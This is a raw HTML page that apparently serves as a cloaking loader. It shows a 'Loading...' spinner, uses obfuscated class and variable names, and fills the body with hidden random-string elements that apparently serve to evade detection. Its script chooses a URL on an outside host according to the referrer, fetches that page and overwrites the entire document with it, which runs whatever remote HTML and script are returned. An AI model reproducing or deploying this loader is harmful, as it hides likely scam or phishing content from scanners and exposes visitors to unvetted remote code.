<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .i1I3qxr {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .i1I3qxr .dbEbir {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .i1I3qxr .content {
            line-height: 50px;
            text-align: center
        }

        .i1I3qxr .img {
            width: 100%
        }

        .i1I3qxr .m8zVoXYkcWq {
            text-align: center
        }

        .i1I3qxr .m8zVoXYkcWq span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .i1I3qxr .m8zVoXYkcWq span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .i1I3qxr .m8zVoXYkcWq span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .i1I3qxr .m8zVoXYkcWq span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .i1I3qxr .m8zVoXYkcWq span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .i1I3qxr .m8zVoXYkcWq span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .i1I3qxr .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function KtVSDz6gqc(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var tEKfeY = KtVSDz6gqc('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ tEKfeY +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ tEKfeY +".html?a=share";
		}
		
        Eqoj3aEVl=url+"#"+new Date().getTime();
        Eqoj3aEVl && function() {
            $.get(Eqoj3aEVl, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>AYfSGQdhv7xW</span>
<span style='display:none'>AYfSGQdhv7xW</span>
<h1 style='display:none' >M9HKqcXbllZX6nIMqnKghwhkk8Ha5iwQtoUFcaPiMQr8oVXEfKMUMGtSlJK1SaMNKLzUyVuP75Q8hoL3BsWkMWlejT38s</h1>
<p  style='display:none'>PGoqWdOg8kUGgSkho8368Ari1E5vVUuBiEwmYmnt</p>
<li style='display:none' >gc9UBL9JlfmT49n622og9y7pdlBmroF</li>
<a  href='#' style='display:none'>LHnzpMCXLELE</a>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<li style='display:none' >gc9UBL9JlfmT49n622og9y7pdlBmroF</li>
<p  style='display:none'>PGoqWdOg8kUGgSkho8368Ari1E5vVUuBiEwmYmnt</p><div class="i1I3qxr">
    <div class="dbEbir">
        <div class="m8zVoXYkcWq">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>ndkvpDeaEYwWQFABt0BxxsDJwl</span>
<div style='display:none'>wmwKu9UFlmdCP9494E</div>
<img  src='' style='display:none'>
<div style='display:none'>wmwKu9UFlmdCP9494E</div>
<b style='display:none' >BwAcKZU6OtYm3</b>
<img  src='' style='display:none'>
<b style='display:none' >BwAcKZU6OtYm3</b>
<li style='display:none' >mAVe7XersCQNIOGKTen</li></body>
</html>